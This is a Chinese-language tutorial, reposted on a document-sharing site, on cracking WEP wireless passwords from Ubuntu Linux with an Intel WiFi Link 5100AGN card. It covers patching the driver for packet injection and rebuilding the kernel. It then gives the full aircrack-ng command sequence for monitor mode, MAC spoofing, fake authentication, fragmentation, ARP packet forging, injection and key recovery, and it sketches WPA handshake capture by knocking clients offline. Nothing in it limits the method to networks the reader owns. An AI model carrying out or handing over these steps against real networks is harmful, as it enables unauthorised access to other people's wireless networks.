为了正常的体验网站,请在浏览器设置里面开启Javascript功能!

Linux下使用Intel_WiFi_Link_5100AGN_破解WEP密码

2011-11-11 6页 pdf 185KB 21阅读

用户头像

is_616878

暂无简介

举报
Linux下使用Intel_WiFi_Link_5100AGN_破解WEP密码 Linux下使用 Intel WiFi Link 5100AGN  破解WEP密码  ID:draapho      别名:mousie  2008年 12月 4 日       撰写此文    前言    之前写过一篇《XP下使用 Intel WiFi Link 5100AGN  破解WEP密码》的文章,但毕竟限 制条件太多,破解速度太慢。经过 google,还是 google,非常幸运的走过了 Ubuntu Linux 的 安装,终端中敲指令,对网卡驱动打补丁,升级内核,最终成功了有资格写下这篇菜鸟级别 的文章了。L...
Linux下使用Intel_WiFi_Link_5100AGN_破解WEP密码
Linux下使用 Intel WiFi Link 5100AGN  破解WEP密码  ID:draapho      别名:mousie  2008年 12月 4 日       撰写此文    前言    之前写过一篇《XP下使用 Intel WiFi Link 5100AGN  破解WEP密码》的文章,但毕竟限 制条件太多,破解速度太慢。经过 google,还是 google,非常幸运的走过了 Ubuntu Linux 的 安装,终端中敲指令,对网卡驱动打补丁,升级内核,最终成功了有资格写下这篇菜鸟级别 的文章了。Linux 高手请无视,因为我还是一个对 cd 指令都要 google的超级菜菜鸟……    说明文中的红色字体都是在终端(shell)中要输入的内容。    本文参考的非常重要的三个网站如下:  1. http://git.kernel.org/?p=linux/kernel/git/linville/wireless‐testing.git;a=commit;h=84e8e77f61 8f589316e83dfa1bfafe5a47bf0bd2  该网站为 5100AGN提供了支持注入的驱动升级,提供了 C源代码  和  diff文件。  2. http://tinyshell.be/aircrackng/forum/index.php?topic=4217.0  该网站验证了 5100AGN能工作于注入模式,并提供升级网卡驱动的思路。  3. http://www.wlanbbs.com  中国无线论坛网,着重参考了“中卫”写的《BT3 破解无线WEP/WPA教程》。      测试环境说明  1. 测试目的:  破解WEP密码  2. 测试系统:  Ubuntu Linux 8.10  3. 测试网卡:  Intel WiFi Link 5100AGN  4. 破解软件:  aircrack  5. 网卡驱动:  Stefanik Gábor 2008 年 9 月 23 日写的驱动      XP下的准备工作  Linux 下当然都能完成这些准备工作,不过是菜鸟么,怎么熟悉怎么来。    1. 安装 Ubuntu 8.10,新手建议在Windows下使用 wubi直接安装,非常非常的方便!  2. http://kernel.org/pub/linux/kernel/v2.6/  选择  linux‐2.6.27.7.tar.gz  下载。当然日后更新的 内核版本应该也能使用,目前能确认的是 2.6.27‐rc7,2.6.27‐rc8 的内核版本都能使用。  3. http://git.kernel.org/?p=linux/kernel/git/linville/wireless‐testing.git;a=commit;h=84e8e77f61 8f589316e83dfa1bfafe5a47bf0bd2  下载 3 个支持注入的 5100AGN的驱动源文件,名字为 iwl‐agn.c 和 iwl‐sta.c 以及  iwl‐tx.c。  4. 为图方便,可以在 XP下查看好要破解WEP的 SSID、MAC地址、工作信道等信息,并用 txt 文件保存好。      Ubuntu下的准备工作  1. 装好的 Ubuntu网卡驱动是直接支持 5100AGN的,只是不能工作在注入模式。首先还是 需要一个可用的网络来下载点东西。  2. 进入 root 权限。Ubuntu 默认情况不允许用 root 帐户登陆,获得 root 权限的方法很多, 讲个对日后操作最方便的方法。  首先,打开终端,输入指令 sudo passwd root,设置新的 root 帐户密码。  然后在左上角点击 System‐>Preferences‐>Login Window 菜单,选择 Security选项,  接着选中其中的“Allow Local system administrator login”选项,确认设置。  最后 Ctrl+Alt+退格,输入 root 及密码重新登陆即可。  这样就永久获得了 root 权限,可以在 Ubuntu中随意的用鼠标拷贝粘贴文件了。  3. sudo apt‐get install aircrack,安装破解软件 aircrack  4. 下载一些配置要用的软件(如果并不想自己配置内核,可跳过)  sudo apt‐get install build‐essential bin86 kernel‐package  sudo apt‐get install libqt3‐headers libqt3‐mt‐dev  5. 稍等片刻,全部下载安装完成后,开始更新网卡驱动,编译 Linux 内核。  打开并解压缩下载的 linux‐2.6.27.7 的内核,把解压后的文件整个拷贝到  /usr/src的目录 下。在这个目录下,还会有几个别的版本的内核文件在呢。  打开这个新内核  /drivers/net/wireless/iwlwifi/,用下载的支持注入的 iwl‐agn.c 和 iwl‐sta.c 以及 iwl‐tx.c三个文件覆盖掉原来的文件。  6. sudo mv linux linux.bak,确保没有叫 linux 的这个链接(好像和快捷方式的概念差不多)  sudo ln ‐s ./linux‐2.6.27.7 linux,把下载的新内核链接到 linux  cd linux,进入 linux 这个目录  7. 配置内核。配置内核是件困难的事情!参数繁多,一不小心就会导致升级失败。所以基 本思路是把当前内核配置文件拷贝过来一用。  sudo cp /boot/config‐`uname ‐r` .config,复制当前的内核配置。  sudo make  xconfig,当然如果想自己再看看配置,微调一下也可以。然后会弹出一个配 置内核的窗口,对配置内核感兴趣的 google,我基本没改。  8. 弄了份现成的配置文件,下一步就是编译了。为以后升级方便,先打包成 deb 包。  cd /usr/src/linux  sudo ‐s –H  make‐kpkg clean  sudo make‐kpkg ‐‐initrd –revision=diy1  kernel_image kernel_headers  最后行输入完毕后,编译需要一个多小时,在确认开始编译后,该干吗干吗去!  9. 安装新的内核。在你的耐心差不多消磨至尽的时候,破解的准备工作也到了最后一步了。  sudo dpkg ‐i /usr/src/kernel‐image‐2.6.27.7*.deb,安装内核包  sudo dpkg ‐i /usr/src/kernel‐headers‐2.6.27.7*.deb,安装内核 headers包  也非常有必要到/usr/src中把这两个 deb 文件给拷贝出来,下次重装 Linux 升级可就不用 这么麻烦了。  sudo dpkg -i <name of the file>,设置 grub 默认引导 现在重启一下,如果顺利,会自动进入 2.6.27.7 的新内核。      破解WEP密码  1. 做了这么多准备工作,终于可以开始动手做想做的事情了。建议大家先别急着输指令, 可以新建个文本文件,把要输入的指令,要破解的 SSID 号,MAC 地址,信道等等全部 安安心心的用拷贝、粘贴大法全部清晰的输入好。  2. 新建一个终端  sudo –s  可省,输入密码后,进入 root 权限。  lsmod    可省,查看驱动列表。反馈信息如下,可以在里面找到 5100AGN的驱动。  Module        Size    Used by  nls_iso8859_1      12288    1    nls_cp437       13952    1    vfat          18816    1    fat          57504    1 vfat  ............  modinfo iwlagn  可省,查看网卡驱动的详情。反馈信息如下。  filename:    /lib/modules/2.6.27.7/kernel/drivers/net/wireless/iwlwifi/iwlagn.ko  alias:     iwl4965  license:    GPL  author:    Copyright(c) 2003‐2008 Intel Corporation  version:    1.3.27ks  description:  Intel(R) Wireless WiFi Link AGN driver for Linux  firmware:    iwlwifi‐4965‐2.ucode  srcversion:  xxxxxxxxxxxxxxxxxxxxxxx  ifconfig –a   可省,查看本机网卡详情。反馈信息如下  eth0      Link encap:Ethernet    HWaddr xx:xx:xx:xx:xx:xx             UP BROADCAST MULTICAST    MTU:1500    Metric:1         RX packets:0 errors:0 dropped:0 overruns:0 frame:0         TX packets:0 errors:0 dropped:0 overruns:0 carrier:0         collisions:0 txqueuelen:1000           RX bytes:0 (0.0 B)    TX bytes:0 (0.0 B)         Interrupt:219 Base address:0x8000      Lo      Link encap:Local Loopback             inet addr:127.0.0.1    Mask:255.0.0.0         UP LOOPBACK RUNNING    MTU:16436    Metric:1         RX packets:246 errors:0 dropped:0 overruns:0 frame:0         TX packets:246 errors:0 dropped:0 overruns:0 carrier:0         collisions:0 txqueuelen:0           RX bytes:15408 (15.4 KB)    TX bytes:15408 (15.4 KB)    pan0     Link encap:Ethernet    HWaddr xx:xx:xx:xx:xx:xx             BROADCAST MULTICAST    MTU:1500    Metric:1         RX packets:0 errors:0 dropped:0 overruns:0 frame:0         TX packets:0 errors:0 dropped:0 overruns:0 carrier:0         collisions:0 txqueuelen:0           RX bytes:0 (0.0 B)    TX bytes:0 (0.0 B)    wlan0    Link encap:Ethernet    HWaddr xx:xx:xx:xx:xx:xx         UP BROADCAST MULTICAST    MTU:1492    Metric:1         RX packets:19 errors:0 dropped:0 overruns:0 frame:0         TX packets:20 errors:0 dropped:0 overruns:0 carrier:0         collisions:0 txqueuelen:1000           RX bytes:5188 (5.1 KB)    TX bytes:3895 (3.8 KB)    wmaster0   Link encap:UNSPEC    HWaddr xx‐xx‐xx‐xx‐……         UP BROADCAST RUNNING MULTICAST    MTU:1500    Metric:1         RX packets:0 errors:0 dropped:0 overruns:0 frame:0         TX packets:0 errors:0 dropped:0 overruns:0 carrier:0         collisions:0 txqueuelen:1000             RX bytes:0 (0.0 B)    TX bytes:0 (0.0 B)  特别关注下深绿色标注的地方,wlan0 为网卡代号,xx:xx:xx:xx:xx:xx为本机MAC。  airmon‐ng   可省,查看本机的网卡。反馈信息如下  Interface  Chipset    Driver  wlan0        iwlagn ‐ [phy0]  macchanger –m 00:11:22:33:44:55 wlan0  可省,修改自己网卡的MAC地址。当对方设置了MAC地址过滤时才有必要用吧,要用 的话需要下载一下的。  airmon‐ng start wlan0 6  必须的!让网卡在信道 6 处监听信息。数字 6 就是要破解 AP的工作信道(channel)。  Interface  Chipset    Driver  wlan0        iwlagn ‐ [phy0]               (monitor mode enabled on mon0)  会返回一个 mon0 处于监听模式的提示,输入第二次的话会变成 mon1,类推。  aireplay‐ng ‐9 mon0  可选,测试注入攻击。如果测试通过,破解WEP就易如反掌了。反馈信息如下   21:00:55    Trying broadcast probe requests...   21:00:55    Injection is working!   21:00:56    Found 3 APs   ……  如果第二行返回值是 No Answer,可能原因有很多,其中包括网卡驱动的问题。  如果第二行返回值是 Injection is working,就说明网卡已经工作在注入攻击模式下。  然后软件会去 ping 每个找到的 AP,这里可以得到信道上所有 AP 的 SSID、MAC、信道、 信号强度等等。  airodump‐ng –ivs –w name –c 6 mon0  必须的!抓 ivs包,name为储存文件的名字,6 为信道,然后会有个一直在抓包的界面  BSSID          PWR RXQ Beacons    #Data,    #/s CH MB    ENC CIPHER AUTH ES  xx:xx:xx:xx:xx:xx    179    3      159              0        0    6    54.    WEP    WEP            T  特别关注  #Data  这栏,它的值就是抓到的 ivs的数量,目前涨的很慢,当我们在第二个 终端中敲几个指令后,就会发现它涨的飞快,过了 1 万,就可以用第三个终端来破解密 码了!    3. 新建第二个终端,不要关掉第一个终端!  aireplay‐ng ‐1 0 ‐e TP‐LINK ‐a 000000000000 ‐h 111111111111 mon0  必须的!进行伪装链接,TP‐LINK 为要破解 AP 的 SSID,000000000000 为要破解 AP 的 MAC 地址,111111111111 为本机网卡的 MAC 地址,如果用 macchanger 伪装过,就输 入伪装后的MAC地址。  aireplay‐ng ‐5 ‐b 000000000000 ‐h 111111111111 mon0  必须的!获得至关重要的 xor文件,参数说明同上个指令。需要一点点抓有效包的时间。  成功以后输入 y,会得到一个 fragment‐XXXXX‐XXXXXX.xor的文件,XXXXX 是数字。  packetforge‐ng ‐0 ‐a 000000000000 ‐h 111111111111 ‐k 255.255.255.255 ‐l 255.255.255.255  ‐y fragment‐XXXXX‐XXXXXX.xor ‐w mrarp  必须的!参数说明同上个指令。fragment‐XXXXX‐XXXXXX.xor就是上个指令中获得的文件。  aireplay‐ng ‐2 ‐r mrarp ‐x 1024 mon0  必须的!注入攻击。  此时第一个终端内的#Data 栏的值应该在飞速增长。    4. 新建第三个终端,前两个终端都不要关闭。  在  #Data 栏的数据达到 10000 以上时,就可以破解了。  aircrack‐ng ‐n 64 ‐b 000000000000 name‐01.ivs  必须的!破解WEP密码,000000000000是要破解 AP的MAC地址。  一般地,几秒内密码就出来了。如果对方的密码设置的比较牛,多抓些 ivs 包后再破解 即可。保存好WEP密码,退出三个终端。      破解WPA密码    要破解 WPA 密码,必须要抓到握手包。这个不难,基本思路是在有客户端的情况 下攻击该客户端使其断线,然后监听其重新联网时的握手协议包。可参考中国无线论坛网  “中卫”写的《BT3 破解无线WEP/WPA教程》。    但 WPA 只能暴力破解,如果没有任何关于密码的信息。光数字加小写字母的 8 位密码 字典就能有几 G 大小,要穷举这些密码,现在的电脑速度还远远不够。所以在没有任何关 于密码信息的情况下,要破解WPA只能是浮云……这里也就没必要多介绍了。      破解WEP密码    本人研究WEP密码破解就此告一段落。从一个完全对破解和 Linux 一窍不通的人,通过 论坛,google,到目前基本弄清了无线网加密技术及破解方法的基本思路和一些皮毛,还是 小有成就的。而意外接触 Ubuntu更是让我对 Linux 兴趣大增,没想到 Linux 已经变得如此方 便!以前望而却步的内核编译也算比较顺利的完成了,当然没玩什么配置,不过有了第一次 成功的体验,以后也就敢于慢慢深入了。    这次用 5100AGN破解WEP密码最大的收获就是:如果想做一件事情,就多做少说,潜 心研究!尤其作为菜鸟,要少发问,多实践,有信心和耐心来攻破难题,定能成功!      全文完 
/
本文档为【Linux下使用Intel_WiFi_Link_5100AGN_破解WEP密码】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑, 图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。 本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。 网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。

历史搜索

    清空历史搜索